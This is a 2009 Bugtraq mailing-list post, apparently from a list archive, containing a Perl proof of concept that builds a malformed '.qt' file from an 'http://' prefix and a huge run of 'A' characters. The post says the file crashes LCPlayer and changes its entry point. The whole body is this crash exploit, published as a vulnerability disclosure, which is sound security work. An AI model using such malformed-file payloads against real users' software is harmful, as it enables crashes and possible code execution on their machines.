[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090204190803.15222.qmail@securityfocus.com>
Date: 4 Feb 2009 19:08:03 -0000
From: darkb0x97@...glemail.com
To: bugtraq@...urityfocus.com
Subject: LCPlayer (.qt file) EOP change PoC (app crash)
#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : darkb0x97@...glemail.com
#after loading the file click on it in the program
#entry point will change and the app will crash
my $file = "dark.qt" ;
my $poc="http://"."A" x 0265487 ;
open(b0x, ">>$file") or die "Cannot open $file";
print b0x $poc;
close(b0x);
print "\n[+] done ! , $file created";
Powered by blists - more mailing lists